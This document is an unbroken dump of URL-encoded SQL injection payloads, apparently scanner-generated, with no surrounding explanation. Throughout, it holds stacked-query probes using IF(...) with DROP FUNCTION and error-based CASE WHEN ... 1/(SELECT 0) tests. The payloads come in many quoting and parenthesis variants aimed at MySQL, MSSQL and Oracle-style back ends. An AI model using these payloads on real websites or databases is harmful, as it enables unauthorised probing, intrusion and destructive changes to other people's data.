1234.5%27%29%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%28%27gmXx%27%3D%27gmXx 1234.5%27%29%29%29%3B%20IF%28%289430%3D5784%29%2CSELECT%209430%2CDROP%20FUNCTION%20dhVj%29%3B%23%20AND%20%28%28%28%27jCIe%27%3D%27jCIe 1234.5%27%3B%20IF%28%281494%3D6147%29%2CSELECT%201494%2CDROP%20FUNCTION%20AqpE%29%3B%23%20AND%20%27VqnU%27%3D%27VqnU 1234.5%27%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%27ADVI%27%3D%27ADVI 1234.5%27%3B%20IF%28%289052%3D4846%29%2CSELECT%209052%2CDROP%20FUNCTION%20QuYx%29%3B%23%20AND%20%27OLOB%27%3D%27OLOB 1234.5%27%29%3B%20IF%28%286611%3D1690%29%2CSELECT%206611%2CDROP%20FUNCTION%20REyE%29%3B%23%20AND%20%28%27RIwX%27%20LIKE%20%27RIwX 1234.5%27%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%27IAUq%27%20LIKE%20%27IAUq 1234.5%27%29%3B%20IF%28%284845%3D9349%29%2CSELECT%204845%2CDROP%20FUNCTION%20pUwm%29%3B%23%20AND%20%28%27fWHj%27%20LIKE%20%27fWHj 1234.5%27%29%29%3B%20IF%28%285896%3D9649%29%2CSELECT%205896%2CDROP%20FUNCTION%20yHRj%29%3B%23%20AND%20%28%28%27mfHG%27%20LIKE%20%27mfHG 1234.5%27%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%27tXDH%27%20LIKE%20%27tXDH 1234.5%27%29%29%3B%20IF%28%282673%3D5901%29%2CSELECT%202673%2CDROP%20FUNCTION%20ykHy%29%3B%23%20AND%20%28%28%27onse%27%20LIKE%20%27onse 1234.5%27%29%29%29%3B%20IF%28%287310%3D1777%29%2CSELECT%207310%2CDROP%20FUNCTION%20mfIZ%29%3B%23%20AND%20%28%28%28%27DnZz%27%20LIKE%20%27DnZz 1234.5%27%29%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%28%27yXpV%27%20LIKE%20%27yXpV 1234.5%27%29%29%29%3B%20IF%28%289261%3D8720%29%2CSELECT%209261%2CDROP%20FUNCTION%20YGWE%29%3B%23%20AND%20%28%28%28%27mxug%27%20LIKE%20%27mxug 1234.5%27%3B%20IF%28%283988%3D4811%29%2CSELECT%203988%2CDROP%20FUNCTION%20TAuH%29%3B%23%20AND%20%27QlXf%27%20LIKE%20%27QlXf 1234.5%27%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%27cHqB%27%20LIKE%20%27cHqB 1234.5%27%3B%20IF%28%287053%3D2123%29%2CSELECT%207053%2CDROP%20FUNCTION%20sxsc%29%3B%23%20AND%20%27eNBC%27%20LIKE%20%27eNBC 1234.5%22%29%3B%20IF%28%281471%3D5890%29%2CSELECT%201471%2CDROP%20FUNCTION%20vjEG%29%3B%23%20AND%20%28%22igIN%22%3D%22igIN 1234.5%22%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%22xKew%22%3D%22xKew 1234.5%22%29%3B%20IF%28%287747%3D7616%29%2CSELECT%207747%2CDROP%20FUNCTION%20YjgO%29%3B%23%20AND%20%28%22iMEr%22%3D%22iMEr 1234.5%22%29%29%3B%20IF%28%283774%3D7991%29%2CSELECT%203774%2CDROP%20FUNCTION%20unoT%29%3B%23%20AND%20%28%28%22AREj%22%3D%22AREj 1234.5%22%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%22ctRl%22%3D%22ctRl 1234.5%22%29%29%3B%20IF%28%288908%3D9267%29%2CSELECT%208908%2CDROP%20FUNCTION%20xSHJ%29%3B%23%20AND%20%28%28%22OZsw%22%3D%22OZsw 1234.5%22%29%29%29%3B%20IF%28%286656%3D2957%29%2CSELECT%206656%2CDROP%20FUNCTION%20sizs%29%3B%23%20AND%20%28%28%28%22XGBz%22%3D%22XGBz 1234.5%22%29%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%28%22UMkK%22%3D%22UMkK 1234.5%22%29%29%29%3B%20IF%28%287320%3D9573%29%2CSELECT%207320%2CDROP%20FUNCTION%20iqJU%29%3B%23%20AND%20%28%28%28%22JQFX%22%3D%22JQFX 1234.5%22%3B%20IF%28%289672%3D4354%29%2CSELECT%209672%2CDROP%20FUNCTION%20mMEs%29%3B%23%20AND%20%22kDMf%22%3D%22kDMf 1234.5%22%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%22cRUL%22%3D%22cRUL 1234.5%22%3B%20IF%28%283096%3D5809%29%2CSELECT%203096%2CDROP%20FUNCTION%20GdOJ%29%3B%23%20AND%20%22MBnW%22%3D%22MBnW 1234.5%22%29%3B%20IF%28%285541%3D3733%29%2CSELECT%205541%2CDROP%20FUNCTION%20vdeC%29%3B%23%20AND%20%28%22mguf%22%20LIKE%20%22mguf 1234.5%22%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%22PhAZ%22%20LIKE%20%22PhAZ 1234.5%22%29%3B%20IF%28%285295%3D1506%29%2CSELECT%205295%2CDROP%20FUNCTION%20wIZj%29%3B%23%20AND%20%28%22wxYe%22%20LIKE%20%22wxYe 1234.5%22%29%29%3B%20IF%28%282910%3D1268%29%2CSELECT%202910%2CDROP%20FUNCTION%20FWxa%29%3B%23%20AND%20%28%28%22jnyW%22%20LIKE%20%22jnyW 1234.5%22%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%22yeOA%22%20LIKE%20%22yeOA 1234.5%22%29%29%3B%20IF%28%284970%3D8795%29%2CSELECT%204970%2CDROP%20FUNCTION%20SKoS%29%3B%23%20AND%20%28%28%22OkKU%22%20LIKE%20%22OkKU 1234.5%22%29%29%29%3B%20IF%28%281734%3D2322%29%2CSELECT%201734%2CDROP%20FUNCTION%20sBsF%29%3B%23%20AND%20%28%28%28%22oUTU%22%20LIKE%20%22oUTU 1234.5%22%29%29%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%28%28%28%22gZns%22%20LIKE%20%22gZns 1234.5%22%29%29%29%3B%20IF%28%285085%3D4403%29%2CSELECT%205085%2CDROP%20FUNCTION%20gysw%29%3B%23%20AND%20%28%28%28%22dnVp%22%20LIKE%20%22dnVp 1234.5%22%3B%20IF%28%289207%3D7301%29%2CSELECT%209207%2CDROP%20FUNCTION%20qksH%29%3B%23%20AND%20%22Yfqz%22%20LIKE%20%22Yfqz 1234.5%22%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20AND%20%22SpcU%22%20LIKE%20%22SpcU 1234.5%22%3B%20IF%28%286703%3D5859%29%2CSELECT%206703%2CDROP%20FUNCTION%20WVwO%29%3B%23%20AND%20%22okTe%22%20LIKE%20%22okTe 1234.5%29%20WHERE%209799%3D9799%3B%20IF%28%287654%3D1761%29%2CSELECT%207654%2CDROP%20FUNCTION%20PzXj%29%3B%23 1234.5%29%20WHERE%207486%3D7486%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%29%20WHERE%205689%3D5689%3B%20IF%28%289833%3D8394%29%2CSELECT%209833%2CDROP%20FUNCTION%20Axoh%29%3B%23 1234.5%27%29%20WHERE%201428%3D1428%3B%20IF%28%288198%3D1446%29%2CSELECT%208198%2CDROP%20FUNCTION%20wSdJ%29%3B%23 1234.5%27%29%20WHERE%204189%3D4189%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%27%29%20WHERE%204564%3D4564%3B%20IF%28%284546%3D3983%29%2CSELECT%204546%2CDROP%20FUNCTION%20kIgt%29%3B%23 1234.5%27%20WHERE%201381%3D1381%3B%20IF%28%288036%3D9300%29%2CSELECT%208036%2CDROP%20FUNCTION%20ZafF%29%3B%23 1234.5%27%20WHERE%203932%3D3932%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%27%20WHERE%202130%3D2130%3B%20IF%28%284840%3D3661%29%2CSELECT%204840%2CDROP%20FUNCTION%20lpeT%29%3B%23 1234.5%22%20WHERE%205457%3D5457%3B%20IF%28%282610%3D5709%29%2CSELECT%202610%2CDROP%20FUNCTION%20XapI%29%3B%23 1234.5%22%20WHERE%208942%3D8942%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23 1234.5%22%20WHERE%201163%3D1163%3B%20IF%28%281167%3D1362%29%2CSELECT%201167%2CDROP%20FUNCTION%20iren%29%3B%23 1234.5%27%20%7C%7C%20%28SELECT%206202%20FROM%20DUAL%20WHERE%207691%3D7691%3B%20IF%28%288817%3D9820%29%2CSELECT%208817%2CDROP%20FUNCTION%20ezCb%29%3B%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209084%20FROM%20DUAL%20WHERE%204683%3D4683%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207518%20FROM%20DUAL%20WHERE%204604%3D4604%3B%20IF%28%282836%3D7357%29%2CSELECT%202836%2CDROP%20FUNCTION%20FSnw%29%3B%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204619%20WHERE%201053%3D1053%3B%20IF%28%285801%3D3068%29%2CSELECT%205801%2CDROP%20FUNCTION%20zIhB%29%3B%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202112%20WHERE%208557%3D8557%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208383%20WHERE%207100%3D7100%3B%20IF%28%284638%3D2945%29%2CSELECT%204638%2CDROP%20FUNCTION%20HgKA%29%3B%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203286%20FROM%20DUAL%20WHERE%201952%3D1952%3B%20IF%28%288240%3D2805%29%2CSELECT%208240%2CDROP%20FUNCTION%20gjGT%29%3B%23%20%29 1234.5%20%2B%20%28SELECT%205665%20FROM%20DUAL%20WHERE%204795%3D4795%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20%29 1234.5%20%2B%20%28SELECT%207033%20FROM%20DUAL%20WHERE%207336%3D7336%3B%20IF%28%286052%3D5980%29%2CSELECT%206052%2CDROP%20FUNCTION%20Mvfe%29%3B%23%20%29 1234.5%20%2B%20%28SELECT%209992%20WHERE%202302%3D2302%3B%20IF%28%286704%3D1698%29%2CSELECT%206704%2CDROP%20FUNCTION%20vdzg%29%3B%23%20%29 1234.5%20%2B%20%28SELECT%202661%20WHERE%207170%3D7170%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20%29 1234.5%20%2B%20%28SELECT%202646%20WHERE%207910%3D7910%3B%20IF%28%281206%3D6554%29%2CSELECT%201206%2CDROP%20FUNCTION%20tYJc%29%3B%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27OTJe%27%20FROM%20DUAL%20WHERE%204936%3D4936%3B%20IF%28%281430%3D7266%29%2CSELECT%201430%2CDROP%20FUNCTION%20iCKf%29%3B%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CkhB%27%20FROM%20DUAL%20WHERE%203471%3D3471%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Dnqs%27%20FROM%20DUAL%20WHERE%204786%3D4786%3B%20IF%28%285295%3D1741%29%2CSELECT%205295%2CDROP%20FUNCTION%20bWgb%29%3B%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27LVmq%27%20WHERE%206010%3D6010%3B%20IF%28%289287%3D7479%29%2CSELECT%209287%2CDROP%20FUNCTION%20Hnvo%29%3B%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CXBs%27%20WHERE%207383%3D7383%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27wzKx%27%20WHERE%204207%3D4207%3B%20IF%28%284507%3D9741%29%2CSELECT%204507%2CDROP%20FUNCTION%20ZxIV%29%3B%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%283687%3D9704%29%2CSELECT%203687%2CDROP%20FUNCTION%20fMqX%29%3B%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%286233%3D6233%29%2CSELECT%206233%2CDROP%20FUNCTION%20looX%29%3B%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20IF%28%282584%3D5291%29%2CSELECT%202584%2CDROP%20FUNCTION%20EhRc%29%3B%23%20%23 -5214%29%3B%20SELECT%20%28CASE%20WHEN%20%284582%3D7637%29%20THEN%204582%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8531%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8719%29%3B%20SELECT%20%28CASE%20WHEN%20%286271%3D2278%29%20THEN%206271%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -4214%27%29%3B%20SELECT%20%28CASE%20WHEN%20%286086%3D6800%29%20THEN%206086%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -4932%27%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8253%27%29%3B%20SELECT%20%28CASE%20WHEN%20%282923%3D2940%29%20THEN%202923%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8242%27%3B%20SELECT%20%28CASE%20WHEN%20%282929%3D1235%29%20THEN%202929%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -2030%27%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -7085%27%3B%20SELECT%20%28CASE%20WHEN%20%284747%3D7588%29%20THEN%204747%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -2525%22%3B%20SELECT%20%28CASE%20WHEN%20%281072%3D4180%29%20THEN%201072%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5186%22%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9339%22%3B%20SELECT%20%28CASE%20WHEN%20%288755%3D7806%29%20THEN%208755%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -7344%29%3B%20SELECT%20%28CASE%20WHEN%20%286893%3D1317%29%20THEN%206893%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%283233%3D3233 -7169%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%285075%3D5075 -6392%29%3B%20SELECT%20%28CASE%20WHEN%20%284911%3D4297%29%20THEN%204911%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%287445%3D7445 -6963%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286244%3D3171%29%20THEN%206244%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%289625%3D9625 -8823%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%289168%3D9168 -4061%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282803%3D7178%29%20THEN%202803%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%285971%3D5971 -6284%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281254%3D9641%29%20THEN%201254%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%284834%3D4834 -8328%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%281574%3D1574 -7345%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%281074%3D7310%29%20THEN%201074%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%286268%3D6268 -3537%3B%20SELECT%20%28CASE%20WHEN%20%281874%3D6866%29%20THEN%201874%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -7980%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -5955%3B%20SELECT%20%28CASE%20WHEN%20%285780%3D9023%29%20THEN%205780%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6492%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287908%3D7067%29%20THEN%207908%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27HuGT%27%3D%27HuGT -3073%27%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27yZES%27%3D%27yZES -6634%27%29%3B%20SELECT%20%28CASE%20WHEN%20%281797%3D2598%29%20THEN%201797%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27puSI%27%3D%27puSI -4936%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283759%3D2009%29%20THEN%203759%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27vSLM%27%3D%27vSLM -5174%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27mPWI%27%3D%27mPWI -7254%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288271%3D4733%29%20THEN%208271%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27uXPC%27%3D%27uXPC -4817%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286678%3D1125%29%20THEN%206678%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27CsTm%27%3D%27CsTm -4343%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27ZuKP%27%3D%27ZuKP -1902%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288862%3D3788%29%20THEN%208862%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27gYqY%27%3D%27gYqY -1596%27%3B%20SELECT%20%28CASE%20WHEN%20%284979%3D9571%29%20THEN%204979%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27UfAh%27%3D%27UfAh -2977%27%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27XuaD%27%3D%27XuaD -9699%27%3B%20SELECT%20%28CASE%20WHEN%20%286173%3D5275%29%20THEN%206173%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27YTMR%27%3D%27YTMR -5353%27%29%3B%20SELECT%20%28CASE%20WHEN%20%287714%3D9047%29%20THEN%207714%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27pAFN%27%20LIKE%20%27pAFN -2795%27%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27uaAi%27%20LIKE%20%27uaAi -9337%27%29%3B%20SELECT%20%28CASE%20WHEN%20%288816%3D4104%29%20THEN%208816%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%27NgpM%27%20LIKE%20%27NgpM -8276%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286627%3D3885%29%20THEN%206627%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27PUaa%27%20LIKE%20%27PUaa -3750%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27Mzmm%27%20LIKE%20%27Mzmm -7669%27%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286444%3D6933%29%20THEN%206444%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%27CzPV%27%20LIKE%20%27CzPV -3479%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286195%3D4463%29%20THEN%206195%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27kfve%27%20LIKE%20%27kfve -8280%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27OGUX%27%20LIKE%20%27OGUX -5884%27%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%282800%3D9440%29%20THEN%202800%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%27dUKi%27%20LIKE%20%27dUKi -5309%27%3B%20SELECT%20%28CASE%20WHEN%20%288821%3D3191%29%20THEN%208821%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27yFoe%27%20LIKE%20%27yFoe -7933%27%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27nwvR%27%20LIKE%20%27nwvR -6561%27%3B%20SELECT%20%28CASE%20WHEN%20%281355%3D9509%29%20THEN%201355%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%27Qnyb%27%20LIKE%20%27Qnyb -1546%22%29%3B%20SELECT%20%28CASE%20WHEN%20%284108%3D8644%29%20THEN%204108%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22SplM%22%3D%22SplM -6654%22%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22lxVx%22%3D%22lxVx -5214%22%29%3B%20SELECT%20%28CASE%20WHEN%20%286502%3D5344%29%20THEN%206502%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22LMto%22%3D%22LMto -5942%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%285862%3D4151%29%20THEN%205862%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22goQY%22%3D%22goQY -1267%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22eRtO%22%3D%22eRtO -5050%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284154%3D2019%29%20THEN%204154%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22oWes%22%3D%22oWes -7499%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283974%3D9272%29%20THEN%203974%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22qUPJ%22%3D%22qUPJ -2410%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22EIAu%22%3D%22EIAu -1656%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%288225%3D4794%29%20THEN%208225%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22WUnO%22%3D%22WUnO -4969%22%3B%20SELECT%20%28CASE%20WHEN%20%286192%3D2019%29%20THEN%206192%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22BkCF%22%3D%22BkCF -8950%22%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22GMnZ%22%3D%22GMnZ -9226%22%3B%20SELECT%20%28CASE%20WHEN%20%285073%3D7293%29%20THEN%205073%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22cUzo%22%3D%22cUzo -2774%22%29%3B%20SELECT%20%28CASE%20WHEN%20%288844%3D7932%29%20THEN%208844%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22wLPS%22%20LIKE%20%22wLPS -3341%22%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22uXel%22%20LIKE%20%22uXel -4120%22%29%3B%20SELECT%20%28CASE%20WHEN%20%282092%3D8865%29%20THEN%202092%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%22OaCk%22%20LIKE%20%22OaCk -7538%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283106%3D9322%29%20THEN%203106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22syoj%22%20LIKE%20%22syoj -7103%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22NwJb%22%20LIKE%20%22NwJb -3385%22%29%29%3B%20SELECT%20%28CASE%20WHEN%20%283602%3D3697%29%20THEN%203602%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%22IHax%22%20LIKE%20%22IHax -3423%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%286809%3D3861%29%20THEN%206809%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22npeG%22%20LIKE%20%22npeG -1793%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22LHHe%22%20LIKE%20%22LHHe -5219%22%29%29%29%3B%20SELECT%20%28CASE%20WHEN%20%287899%3D8744%29%20THEN%207899%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%28%28%28%22cKvs%22%20LIKE%20%22cKvs -3837%22%3B%20SELECT%20%28CASE%20WHEN%20%286701%3D7738%29%20THEN%206701%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22qdxc%22%20LIKE%20%22qdxc -6226%22%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22wxbm%22%20LIKE%20%22wxbm -6138%22%3B%20SELECT%20%28CASE%20WHEN%20%283566%3D6791%29%20THEN%203566%20ELSE%201%2F%28SELECT%200%29%20END%29%3B--%20AND%20%22LaIu%22%20LIKE%20%22LaIu -5441%29%20WHERE%204661%3D4661%3B%20SELECT%20%28CASE%20WHEN%20%289561%3D3608%29%20THEN%209561%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -6314%29%20WHERE%203040%3D3040%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -4058%29%20WHERE%208504%3D8504%3B%20SELECT%20%28CASE%20WHEN%20%288131%3D2937%29%20THEN%208131%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8235%27%29%20WHERE%206741%3D6741%3B%20SELECT%20%28CASE%20WHEN%20%281429%3D7175%29%20THEN%201429%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -8827%27%29%20WHERE%203919%3D3919%3B%20SELECT%20%28CASE%20WHEN%20%284106%3D4106%29%20THEN%204106%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -9896%27%29%20WHERE%204647%3D4647%3B%20SELECT%20%28CASE%20WHEN%20%289244%3D8219%29%20THEN%209244%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- -1492%27%20WHERE%202721%3D2721%3B%20SELECT%20%28CASE%20WHEN%20%282935%3D1023%29%20THEN%202935%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- 